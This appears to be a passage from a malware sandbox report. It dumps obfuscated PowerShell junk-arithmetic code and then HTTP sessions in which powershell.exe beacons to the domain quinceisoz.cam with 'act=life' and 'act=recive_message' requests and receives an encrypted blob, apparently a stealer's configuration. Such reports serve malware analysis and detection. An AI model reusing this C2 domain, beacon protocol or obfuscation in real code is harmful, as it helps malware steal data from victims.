                                                      2025-01-08 12:55:08 UTC302INData Raw: 20 28 28 28 24 79 64 6f 54 57 6b 66 48 20 2b 20 2d 38 30 33 29 20 2a 20 2d 32 34 35 30 29 29 29 29 20 2a 20 28 28 30 20 2d 20 33 33 36 30 31 29 20 2d 20 37 31 30 35 31 34 29 29 0d 0a 24 57 54 79 63 6a 62 51 4f 65 20 3d 20 28 28 28 28 28 2d 37 20 2b 20 28 28 28 28 28 28 24 61 4e 70 54 6e 63 6a 76 61 70 4a 20 2d 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2a 20 34 32 32 29 20 2b 20 24 5a 6f 6d 77 5a 6f 29 29 20 2d 20 28 28 2d 37 34 20 2d 20 28 28 28 28 28 37 31 37 34 39 20 2a 20 32 31 29 20 2b 20 24 79 64 6f 54 57 6b 66 48 29 20 2a 20 24 59 51 55 69 6d 48 48 77 29 20 2b 20 39 38 31 31 29 29 29 20 2d 20 28 28 28 28 2d 37 33 20 2d 20 33 32 36 32 38 30 29 20 2a 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 20 2a 20 24 73 4f 65 4b 49 59 44 4b 71 65 59 29 29 29 29 29 29 20 2b
                                                      Data Ascii: ((($ydoTWkfH + -803) * -2450)))) * ((0 - 33601) - 710514))$WTycjbQOe = (((((-7 + (((((($aNpTncjvapJ - $KVHojVRko) * 422) + $ZomwZo)) - ((-74 - (((((71749 * 21) + $ydoTWkfH) * $YQUimHHw) + 9811))) - ((((-73 - 326280) * $KVHojVRko) * $sOeKIYDKqeY)))))) +
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 20 2a 20 32 30 34 29 29 20 2a 20 28 28 28 28 28 32 31 38 20 2b 20 28 28 28 28 28 24 79 64 6f 54 57 6b 66 48 20 2a 20 2d 36 29 20 2d 20 2d 34 37 38 39 29 20 2a 20 24 73 4f 65 4b 49 59 44 4b 71 65 59 29 20 2a 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 29 29 20 2d 20 34 31 35 35 32 32 29 20 2a 20 24 5a 6f 6d 77 5a 6f 29 20 2b 20 24 5a 6f 6d 77 5a 6f 29 20 2d 20 28 28 28 28 28 24 4c 6b 56 48 53 56 73 46 6b 68 20 2b 20 24 79 64 6f 54 57 6b 66 48 29 20 2b 20 24 79 64 6f 54 57 6b 66 48 29 20 2d 20 2d 36 38 33 34 29 20 2b 20 24 51 6f 66 70 6c 68 4e 66 29 29 29 29 29 0d 0a 24 45 77 44 6a 55 56 44 59 66 4d 20 3d 20 34 0d 0a 77 68 69 6c 65 20 28 24 45 77 44 6a 55 56 44 59 66 4d 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 24 6e 6e 73 6c 73 6c 42 53 67 20 3d 20
                                                      Data Ascii: * 204)) * (((((218 + ((((($ydoTWkfH * -6) - -4789) * $sOeKIYDKqeY) * $KVHojVRko))) - 415522) * $ZomwZo) + $ZomwZo) - ((((($LkVHSVsFkh + $ydoTWkfH) + $ydoTWkfH) - -6834) + $QofplhNf)))))$EwDjUVDYfM = 4while ($EwDjUVDYfM -gt 0) { $nnslslBSg =
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 49 59 44 4b 71 65 59 20 2a 20 24 58 72 56 4b 4c 4a 29 20 2a 20 31 33 36 29 20 2d 20 35 29 20 2d 20 2d 38 31 29 20 2b 20 24 4a 4f 44 72 72 75 29 29 29 0d 0a 7d 0d 0a 24 58 59 4f 4b 4e 58 20 3d 20 35 0d 0a 77 68 69 6c 65 20 28 24 58 59 4f 4b 4e 58 20 2d 67 74 20 30 29 20 7b 0d 0a 20 20 20 20 69 66 20 28 28 24 7a 43 49 55 6a 55 55 42 59 20 2d 6c 74 20 24 61 4e 70 54 6e 63 6a 76 61 70 4a 29 20 2d 61 6e 64 20 28 35 30 34 33 20 2d 67 74 20 24 5a 46 51 72 71 73 48 53 69 46 4d 29 29 20 7b 0d 0a 20 20 20 20 24 67 68 66 64 72 6f 66 20 3d 20 28 28 28 2d 35 20 2a 20 2d 38 38 29 20 2a 20 2d 31 33 34 29 20 2b 20 24 4b 56 48 6f 6a 56 52 6b 6f 29 0d 0a 7d 0d 0a 20 20 20 20 20 20 20 20 24 67 68 66 64 72 6f 66 20 3d 20 28 28 28 28 28 28 28 2d 31 30 39 30 34 30 20 2a 20 24
                                                      Data Ascii: IYDKqeY * $XrVKLJ) * 136) - 5) - -81) + $JODrru)))}$XYOKNX = 5while ($XYOKNX -gt 0) { if (($zCIUjUUBY -lt $aNpTncjvapJ) -and (5043 -gt $ZFQrqsHSiFM)) { $ghfdrof = (((-5 * -88) * -134) + $KVHojVRko)} $ghfdrof = (((((((-109040 * $
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 56 41 78 50 51 48 29 20 2d 6f 72 20 28 24 5a 46 51 72 71 73 48 53 69 46 4d 20 2d 6e 65 20 38 36 39 37 29 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 24 6c 66 7a 68 6e 4f 42 4a 5a 20 3d 20 28 28 28 28 24 5a 6f 6d 77 5a 6f 20 2b 20 24 67 68 66 64 72 6f 66 29 20 2d 20 32 35 30 35 29 29 20 2d 20 28 28 28 28 28 28 28 24 6a 7a 79 6a 58 58 61 6c 59 20 2d 20 33 30 38 29 20 2a 20 24 6e 6e 73 6c 73 6c 42 53 67 29 20 2b 20 37 33 33 33 30 33 29 20 2d 20 28 28 28 28 24 57 54 79 63 6a 62 51 4f 65 20 2a 20 2d 35 29 20 2b 20 24 79 64 6f 54 57 6b 66 48 29 20 2a 20 24 72 52 48 76 77 6e 77 66 4b 70 52 29 29 29 20 2b 20 24 4c 6b 56 48 53 56 73 46 6b 68 29 29 20 2a 20 28 28 28 28 24 4c 6b 56 48 53 56 73 46 6b 68 20 2d 20 24 61 4e 70 54 6e 63 6a 76 61 70 4a 29 20 2d 20 24 62 68
                                                      Data Ascii: VAxPQH) -or ($ZFQrqsHSiFM -ne 8697)) { $lfzhnOBJZ = (((($ZomwZo + $ghfdrof) - 2505)) - ((((((($jzyjXXalY - 308) * $nnslslBSg) + 733303) - (((($WTycjbQOe * -5) + $ydoTWkfH) * $rRHvwnwfKpR))) + $LkVHSVsFkh)) * (((($LkVHSVsFkh - $aNpTncjvapJ) - $bh
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 6f 66 70 6c 68 4e 66 20 3d 20 28 28 33 39 37 20 2d 20 24 51 6f 66 70 6c 68 4e 66 29 20 2b 20 28 28 28 28 28 28 2d 37 35 30 32 31 20 2a 20 24 59 51 55 69 6d 48 48 77 29 20 2d 20 2d 36 36 30 29 20 2b 20 35 37 33 36 29 20 2d 20 24 4a 4f 44 72 72 75 29 20 2a 20 24 4c 6b 56 48 53 56 73 46 6b 68 29 29 29 0d 0a 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 24 51 6f 66 70 6c 68 4e 66 20 3d 20 28 28 28 28 28 2d 33 36 20 2a 20 24 4d 6c 4a 57 6a 72 59 70 29 20 2d 20 28 28 28 28 28 24 5a 46 51 72 71 73 48 53 69 46 4d 20 2b 20 24 5a 6f 6d 77 5a 6f 29 20 2d 20 2d 36 29 20 2d 20 39 32 31 30 39 29 20 2d 20 24 4a 4f 44 72 72 75 29 29 29 20 2a 20 28 28 28 39 30 34 38 20 2a 20 24 6a 7a 79 6a 58 58 61 6c 59 29 20 2d 20 2d 39 33 35 36 38 39 29 29 29 29 20 2d
                                                      Data Ascii: ofplhNf = ((397 - $QofplhNf) + ((((((-75021 * $YQUimHHw) - -660) + 5736) - $JODrru) * $LkVHSVsFkh))) } $QofplhNf = (((((-36 * $MlJWjrYp) - ((((($ZFQrqsHSiFM + $ZomwZo) - -6) - 92109) - $JODrru))) * (((9048 * $jzyjXXalY) - -935689)))) -
                                                      2025-01-08 12:55:08 UTC1369INData Raw: 20 2d 67 74 20 24 57 54 79 63 6a 62 51 4f 65 29 20 2d 61 6e 64 20 28 2d 39 37 39 31 20 2d 67 65 20 24 47 67 6a 64 54 56 54 4e 50 63 29 29 20 7b 0d 0a 20 20 20 20 20 24 46 4b 75 76 62 58 5a 4f 45 76 5a 20 3d 20 28 28 28 28 35 38 35 20 2d 20 24 46 4b 75 76 62 58 5a 4f 45 76 5a 29 20 2d 20 24 67 68 66 64 72 6f 66 29 20 2d 20 2d 36 30 32 38 37 34 29 20 2a 20 2d 38 33 29 0d 0a 7d 0d 0a 24 73 4f 65 4b 49 59 44 4b 71 65 59 20 3d 20 28 28 38 39 34 20 2d 20 2d 35 39 32 29 20 2d 20 35 34 29 0d 0a 24 51 6f 66 70 6c 68 4e 66 20 3d 20 28 28 24 6a 7a 79 6a 58 58 61 6c 59 20 2d 20 24 59 51 55 69 6d 48 48 77 29 20 2d 20 24 6c 66 7a 68 6e 4f 42 4a 5a 29 0d 0a 69 66 20 28 28 37 39 36 31 36 20 2d 6c 65 20 36 35 34 38 39 29 20 2d 6f 72 20 28 24 73 4f 65 4b 49 59 44 4b 71 65
                                                      Data Ascii: -gt $WTycjbQOe) -and (-9791 -ge $GgjdTVTNPc)) { $FKuvbXZOEvZ = ((((585 - $FKuvbXZOEvZ) - $ghfdrof) - -602874) * -83)}$sOeKIYDKqeY = ((894 - -592) - 54)$QofplhNf = (($jzyjXXalY - $YQUimHHw) - $lfzhnOBJZ)if ((79616 -le 65489) -or ($sOeKIYDKqe


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.749977104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:33 UTC261OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 8
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:33 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                      Data Ascii: act=life
                                                      2025-01-08 12:56:34 UTC1133INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:34 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=fd010mmfba10h8672ip1sh0qna; expires=Sun, 04 May 2025 06:43:13 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VyLpWoUxl0p5mtqBbMqGSprkLHQwQtV6DWDpSIt251zLIeWtJ%2BxaVNA17xPRKB4M%2Bikgy%2FucImgQbPOvqgXwON6a5YymYZthXB%2Bec%2F%2BlmJt2G2pAfddVgvH6%2FeKmd8TY5g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec592b5dc90f5b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1628&min_rtt=1620&rtt_var=624&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3043&recv_bytes=905&delivery_rate=2594786&cwnd=222&unsent_bytes=0&cid=4902bff5ed407640&ts=458&x=0"
                                                      2025-01-08 12:56:34 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                      Data Ascii: 2ok
                                                      2025-01-08 12:56:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.749978104.21.112.14437508C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-08 12:56:34 UTC262OUTPOST /api HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                      Content-Length: 47
                                                      Host: quinceisoz.cam
                                                      2025-01-08 12:56:34 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 57 47 36 49 36 53 2d 2d 77 65 62 35 35 26 6a 3d
                                                      Data Ascii: act=recive_message&ver=4.0&lid=WG6I6S--web55&j=
                                                      2025-01-08 12:56:35 UTC1125INHTTP/1.1 200 OK
                                                      Date: Wed, 08 Jan 2025 12:56:35 GMT
                                                      Content-Type: text/html; charset=UTF-8
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      Set-Cookie: PHPSESSID=5tmbhp3peabvnq1qghbe2vvs0m; expires=Sun, 04 May 2025 06:43:13 GMT; Max-Age=9999999; path=/
                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                      Pragma: no-cache
                                                      X-Frame-Options: DENY
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      cf-cache-status: DYNAMIC
                                                      vary: accept-encoding
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WmAvJNR84h0vscC%2BaGx9NUbjpsO2jwYpucqQIcmf3WxQIs%2BFV5fjwq7TB24bbF6O6WxT%2F9eKzvuVsdkSJp3dXpvxMOeVpezlPge59gsMGfr7XRhYtQorvbJgxqUKKz35ag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8fec59312db50f5b-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1602&rtt_var=618&sent=5&recv=6&lost=0&retrans=0&sent_bytes=3044&recv_bytes=945&delivery_rate=2618051&cwnd=222&unsent_bytes=0&cid=57ff6f4f84bdbf4c&ts=504&x=0"
                                                      2025-01-08 12:56:35 UTC244INData Raw: 34 39 39 34 0d 0a 73 46 43 64 77 33 69 2b 71 55 6c 6e 56 36 66 4b 53 70 42 49 76 2f 61 57 58 45 46 4e 52 4c 47 79 6e 45 45 7a 4b 4e 7a 32 52 79 6a 4c 63 75 76 68 51 6f 71 46 61 78 51 79 68 66 41 2b 34 6a 33 61 32 72 51 39 4a 57 39 2b 31 39 50 77 4d 6c 59 45 2f 6f 41 71 43 6f 6f 32 2f 4b 38 4c 32 34 56 72 41 69 2b 46 38 42 48 72 61 74 71 59 74 47 5a 6a 4b 43 37 54 30 2f 41 6a 55 6b 4f 7a 68 69 74 4c 32 44 7a 36 71 78 33 64 7a 53 67 4c 4f 73 4b 76 4c 2f 45 69 30 5a 2f 37 4e 43 78 76 61 4a 50 58 35 6d 4d 4a 43 70 47 54 4d 30 6e 39 4d 65 36 6f 57 73 4f 46 4d 6b 55 79 79 65 68 77 73 69 6e 61 6c 50 6f 36 4a 53 59 73 32 64 72 34 49 6c 64 43 72 4a 38 68 51 4e 67 79 2b 61 6f 58 31 4e 6b 6c 41 54 33 4a 71 53 58 78 61 70 50 55 38 79
                                                      Data Ascii: 4994sFCdw3i+qUlnV6fKSpBIv/aWXEFNRLGynEEzKNz2RyjLcuvhQoqFaxQyhfA+4j3a2rQ9JW9+19PwMlYE/oAqCoo2/K8L24VrAi+F8BHratqYtGZjKC7T0/AjUkOzhitL2Dz6qx3dzSgLOsKvL/Ei0Z/7NCxvaJPX5mMJCpGTM0n9Me6oWsOFMkUyyehwsinalPo6JSYs2dr4IldCrJ8hQNgy+aoX1NklAT3JqSXxapPU8y
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 5a 6a 64 32 61 41 34 76 30 79 51 46 2b 7a 68 43 4d 4b 7a 58 7a 6d 34 52 33 51 69 33 4e 46 50 63 6d 6d 4c 66 45 6c 32 70 58 30 4c 43 77 76 4a 64 76 59 2b 69 6c 65 52 62 47 61 4c 30 33 61 4f 2f 69 75 48 64 54 4e 4a 41 5a 31 69 2b 67 76 36 6d 71 46 31 4e 51 75 49 43 77 79 33 73 47 2b 50 42 39 54 2f 70 4d 70 43 6f 70 79 2b 61 38 62 30 63 73 35 44 54 37 4f 72 54 72 35 49 39 43 5a 39 44 4d 70 49 43 58 54 31 2f 51 70 58 6b 43 36 6d 53 68 4d 30 6a 4b 2f 37 31 72 62 30 32 74 64 64 65 61 74 4f 50 55 6d 79 39 62 4f 66 6a 78 68 50 35 50 58 38 6d 4d 4a 43 72 61 52 4a 6b 6e 5a 50 66 79 70 45 63 37 4c 4f 51 4d 34 77 4c 6f 75 39 79 54 58 6c 2b 59 30 4c 53 6b 6c 32 74 76 33 4a 6c 5a 4f 2f 74 70 6c 54 63 70 79 70 2b 45 37 30 63 41 6e 44 79 4c 46 36 44 65 38 4d 35 32 54 2b
                                                      Data Ascii: Zjd2aA4v0yQF+zhCMKzXzm4R3Qi3NFPcmmLfEl2pX0LCwvJdvY+ileRbGaL03aO/iuHdTNJAZ1i+gv6mqF1NQuICwy3sG+PB9T/pMpCopy+a8b0cs5DT7OrTr5I9CZ9DMpICXT1/QpXkC6mShM0jK/71rb02tddeatOPUmy9bOfjxhP5PX8mMJCraRJknZPfypEc7LOQM4wLou9yTXl+Y0LSkl2tv3JlZO/tplTcpyp+E70cAnDyLF6De8M52T+
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 70 33 74 79 2b 62 52 46 4e 70 74 52 39 43 76 67 78 36 36 49 51 6e 76 34 6f 43 7a 76 43 76 6d 6a 74 5a 4d 54 55 38 7a 4a 6a 64 32 62 65 30 66 59 6c 51 30 57 7a 6c 79 74 45 33 54 66 77 71 52 72 63 78 69 34 42 50 73 36 72 4a 66 59 34 31 35 54 38 4f 79 49 6c 4c 4a 4f 65 76 69 52 4a 43 75 62 55 46 46 33 5a 63 4d 71 69 46 4e 4c 4d 50 55 55 71 69 37 46 6f 39 53 61 64 7a 4c 51 7a 4b 79 6f 6a 33 4e 48 30 4c 56 52 41 73 70 77 72 53 63 41 39 2b 36 45 57 31 4d 45 6d 43 7a 48 4e 6f 53 50 35 4c 4e 32 56 2f 6e 35 74 62 79 48 4c 6b 4b 5a 6a 5a 55 32 79 6d 53 6f 49 35 7a 48 78 72 78 33 4b 69 7a 52 4c 4c 49 57 76 4a 4c 4a 79 6e 5a 6a 39 50 69 67 6c 49 74 50 58 38 79 5a 53 54 62 32 5a 49 6b 44 63 4e 66 75 74 45 39 48 4e 4b 77 49 78 77 4c 6f 74 2b 79 62 52 31 4c 70 2b 4a 44
                                                      Data Ascii: p3ty+bRFNptR9Cvgx66IQnv4oCzvCvmjtZMTU8zJjd2be0fYlQ0WzlytE3TfwqRrcxi4BPs6rJfY415T8OyIlLJOeviRJCubUFF3ZcMqiFNLMPUUqi7Fo9SadzLQzKyoj3NH0LVRAspwrScA9+6EW1MEmCzHNoSP5LN2V/n5tbyHLkKZjZU2ymSoI5zHxrx3KizRLLIWvJLJynZj9PiglItPX8yZSTb2ZIkDcNfutE9HNKwIxwLot+ybR1Lp+JD
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 76 69 52 64 43 75 62 55 4c 45 50 41 50 50 47 6f 46 39 72 44 4c 41 73 34 7a 71 34 6a 39 53 33 62 6d 66 77 7a 4a 69 77 6e 31 39 72 73 49 46 70 41 73 35 35 6c 42 4a 49 31 35 2b 46 43 6e 4f 77 6e 4c 43 58 65 75 6a 36 79 4e 5a 4f 4e 74 44 6b 76 62 33 36 54 30 2f 45 71 58 6b 4b 32 6d 79 70 4f 33 44 54 35 72 42 2f 54 77 54 6b 4e 4f 38 69 6a 4a 2f 6b 34 33 5a 6e 77 4d 69 63 6e 4c 64 6d 51 73 47 4e 57 55 76 37 4d 5a 58 2f 66 50 66 2b 69 44 4a 7a 55 5a 52 78 31 77 71 52 6f 71 6d 72 52 6d 76 51 78 4c 79 4d 74 32 39 48 79 4c 56 5a 50 74 35 77 74 57 4e 4d 32 39 36 41 55 30 38 6f 76 41 44 44 42 72 79 7a 30 4a 5a 33 61 74 44 6b 37 62 33 36 54 2f 39 6b 57 45 32 75 45 31 44 6f 45 79 33 4c 34 72 56 71 45 69 79 63 47 4f 63 32 6e 4c 76 73 6d 31 35 33 2f 4d 69 67 72 4b 74 72
                                                      Data Ascii: viRdCubULEPAPPGoF9rDLAs4zq4j9S3bmfwzJiwn19rsIFpAs55lBJI15+FCnOwnLCXeuj6yNZONtDkvb36T0/EqXkK2mypO3DT5rB/TwTkNO8ijJ/k43ZnwMicnLdmQsGNWUv7MZX/fPf+iDJzUZRx1wqRoqmrRmvQxLyMt29HyLVZPt5wtWNM296AU08ovADDBryz0JZ3atDk7b36T/9kWE2uE1DoEy3L4rVqEiycGOc2nLvsm153/MigrKtr
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 45 75 34 68 69 4a 44 77 44 7a 79 72 68 4c 55 77 69 6f 42 4d 4d 69 75 4a 50 67 72 32 70 72 36 4e 6d 4e 68 5a 74 54 49 76 6e 73 52 61 36 36 50 4e 31 7a 66 45 2f 4b 75 57 73 4f 46 4d 6b 55 79 79 65 68 77 73 69 50 50 6b 50 6b 73 4b 69 67 6f 33 4e 50 73 49 6c 78 42 72 4a 4d 71 54 74 55 2b 2b 61 34 63 33 63 34 68 43 54 4c 41 6f 79 66 2b 61 70 50 55 38 79 5a 6a 64 32 62 39 32 2b 30 30 55 6b 53 31 67 6a 34 4b 7a 58 7a 6d 34 52 33 51 69 33 4e 46 4e 73 36 6a 4c 50 49 6d 33 5a 44 35 50 6a 45 67 49 64 54 5a 39 54 46 62 54 62 6d 66 4c 55 48 64 4e 4f 32 74 46 4d 37 4f 4f 52 64 31 69 2b 67 76 36 6d 71 46 31 4d 49 35 4d 7a 38 6c 6b 65 48 6f 49 45 64 42 73 35 68 6c 56 5a 77 72 76 36 59 57 6e 4a 4e 72 41 7a 72 4d 71 79 66 7a 49 39 47 5a 38 54 63 6d 4c 69 44 58 32 76 51 6a
                                                      Data Ascii: Eu4hiJDwDzyrhLUwioBMMiuJPgr2pr6NmNhZtTIvnsRa66PN1zfE/KuWsOFMkUyyehwsiPPkPksKigo3NPsIlxBrJMqTtU++a4c3c4hCTLAoyf+apPU8yZjd2b92+00UkS1gj4KzXzm4R3Qi3NFNs6jLPIm3ZD5PjEgIdTZ9TFbTbmfLUHdNO2tFM7OORd1i+gv6mqF1MI5Mz8lkeHoIEdBs5hlVZwrv6YWnJNrAzrMqyfzI9GZ8TcmLiDX2vQj
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 74 72 55 35 49 31 38 2b 46 43 6e 4d 67 73 42 6a 54 50 6f 53 54 39 4c 64 6d 47 2f 6a 6b 78 4c 69 66 59 33 66 49 6a 58 45 65 30 6c 53 78 48 33 6a 2f 34 70 68 58 5a 69 32 56 46 4d 74 33 6f 63 4c 49 4c 30 4a 2f 34 5a 58 6c 76 4f 5a 33 4a 76 69 52 64 43 75 62 55 4a 55 44 58 4f 50 4b 69 46 64 2f 5a 4b 67 4d 6e 78 61 55 69 34 43 44 57 6b 66 6b 7a 4c 69 77 67 31 64 76 79 4d 56 68 4b 76 5a 39 6c 42 4a 49 31 35 2b 46 43 6e 4f 67 38 45 7a 2f 43 70 44 37 35 4b 39 36 43 2b 53 35 6a 59 57 62 43 31 2b 39 6a 43 56 79 75 67 79 4a 56 6e 43 75 2f 70 68 61 63 6b 32 73 44 50 4d 4f 76 4c 76 77 34 32 4a 4c 37 4d 53 6f 6d 49 74 76 54 2f 69 64 56 54 62 75 58 4b 55 48 56 4d 66 43 6c 45 39 4c 43 4a 45 56 37 68 61 38 77 73 6e 4b 64 74 65 38 39 4c 79 4a 6d 7a 4a 37 6e 59 31 5a 47 2f
                                                      Data Ascii: trU5I18+FCnMgsBjTPoST9LdmG/jkxLifY3fIjXEe0lSxH3j/4phXZi2VFMt3ocLIL0J/4ZXlvOZ3JviRdCubUJUDXOPKiFd/ZKgMnxaUi4CDWkfkzLiwg1dvyMVhKvZ9lBJI15+FCnOg8Ez/CpD75K96C+S5jYWbC1+9jCVyugyJVnCu/phack2sDPMOvLvw42JL7MSomItvT/idVTbuXKUHVMfClE9LCJEV7ha8wsnKdte89LyJmzJ7nY1ZG/
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 4b 63 74 2b 71 44 4e 6e 4d 50 55 63 41 78 71 59 6d 39 54 79 64 69 38 74 77 59 79 41 38 6b 34 6a 48 4f 68 46 4e 73 74 52 39 43 73 63 31 2f 36 59 41 79 73 77 6e 46 44 37 49 70 41 72 39 4c 63 75 58 2b 7a 30 79 4a 6d 72 59 33 62 35 74 45 55 32 6d 31 48 30 4b 2f 54 58 70 6f 6a 58 66 32 69 4a 46 65 34 57 76 50 72 4a 79 6e 61 71 30 4c 43 41 2f 4a 64 7a 42 77 47 4d 4a 55 34 44 55 4c 6c 7a 56 49 76 79 33 45 64 48 48 4f 6a 74 31 6e 66 78 36 6f 48 69 50 78 75 74 2b 50 42 42 6f 6b 39 47 2b 65 32 68 54 2f 6f 4a 6c 45 6f 42 38 76 37 4e 61 68 49 74 73 42 69 66 58 72 69 76 6b 4b 5a 71 71 79 68 6b 31 4a 53 48 44 31 2b 6b 73 45 51 54 2b 6d 32 55 53 36 33 4c 32 70 67 48 4e 33 53 59 56 4d 6f 57 58 5a 72 49 79 6e 63 79 30 43 79 41 68 4b 4e 54 47 37 32 35 32 58 4c 53 54 4e 55
                                                      Data Ascii: Kct+qDNnMPUcAxqYm9Tydi8twYyA8k4jHOhFNstR9Csc1/6YAyswnFD7IpAr9LcuX+z0yJmrY3b5tEU2m1H0K/TXpojXf2iJFe4WvPrJynaq0LCA/JdzBwGMJU4DULlzVIvy3EdHHOjt1nfx6oHiPxut+PBBok9G+e2hT/oJlEoB8v7NahItsBifXrivkKZqqyhk1JSHD1+ksEQT+m2US63L2pgHN3SYVMoWXZrIyncy0CyAhKNTG7252XLSTNU
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 37 31 72 4a 77 43 63 44 4f 4e 44 6e 4f 65 51 70 79 35 4f 34 4e 6a 49 69 4b 70 50 76 73 47 4e 4a 43 75 62 55 45 45 6e 63 50 50 69 33 43 35 48 72 49 41 6b 32 79 61 6b 76 73 6d 53 64 6b 72 52 6d 63 47 46 6d 31 38 47 2b 65 77 45 59 35 63 46 32 48 59 4a 67 34 4f 38 44 6e 4e 31 72 58 57 65 4c 36 44 71 79 63 70 33 54 39 79 77 78 4b 53 58 46 30 37 6b 64 62 30 75 7a 6d 32 6c 45 32 54 4c 34 73 51 7a 48 68 79 4d 47 4c 39 2b 57 46 74 6b 6d 32 35 50 75 4f 53 55 4a 42 70 4f 65 76 69 77 52 45 6f 66 55 62 51 72 74 66 4c 2b 35 57 6f 53 4c 48 67 59 37 79 36 38 2b 34 32 66 31 74 38 34 45 59 51 4d 68 78 70 4c 4b 4a 45 46 62 74 5a 6b 70 43 70 78 79 2b 65 46 43 6a 49 56 72 41 53 53 46 38 48 69 67 63 59 6a 48 6f 32 35 78 4d 47 6a 4b 6b 4f 68 6a 43 52 6a 77 31 44 63 4b 69 6e 4b
                                                      Data Ascii: 71rJwCcDONDnOeQpy5O4NjIiKpPvsGNJCubUEEncPPi3C5HrIAk2yakvsmSdkrRmcGFm18G+ewEY5cF2HYJg4O8DnN1rXWeL6Dqycp3T9ywxKSXF07kdb0uzm2lE2TL4sQzHhyMGL9+WFtkm25PuOSUJBpOeviwREofUbQrtfL+5WoSLHgY7y68+42f1t84EYQMhxpLKJEFbtZkpCpxy+eFCjIVrASSF8HigcYjHo25xMGjKkOhjCRjw1DcKinK
                                                      2025-01-08 12:56:35 UTC1369INData Raw: 34 56 72 46 33 57 64 36 47 2f 38 4a 39 79 58 2b 6a 30 78 50 53 44 51 78 76 31 6b 62 33 53 62 6d 53 68 50 33 44 58 42 6e 7a 76 57 32 79 59 4b 4d 6f 65 49 4c 2b 51 70 34 36 72 44 4c 79 51 2f 5a 50 58 54 36 43 41 52 42 50 36 4d 5a 52 4b 53 45 2f 57 78 46 39 50 4d 61 53 55 79 30 36 74 6f 76 47 72 5a 31 4b 78 2b 42 69 49 72 31 74 37 35 59 58 42 41 72 70 6b 71 54 5a 41 53 2b 4c 63 5a 6e 49 56 72 43 58 57 64 36 43 6e 34 4f 74 43 62 38 33 49 6b 4e 53 47 54 6e 72 34 74 45 52 4c 2b 6c 53 39 61 33 7a 33 34 37 52 7a 53 78 57 73 61 65 39 7a 6f 50 72 4a 79 6a 74 71 30 4c 47 4e 33 5a 70 54 54 37 44 46 58 53 61 69 58 59 6e 54 73 48 2b 32 6d 43 74 2b 4a 47 67 67 78 30 37 30 72 34 69 33 6a 71 74 6b 73 4a 44 38 6c 6b 65 48 6f 49 46 46 45 75 64 52 72 43 73 70 79 70 2b 45 33
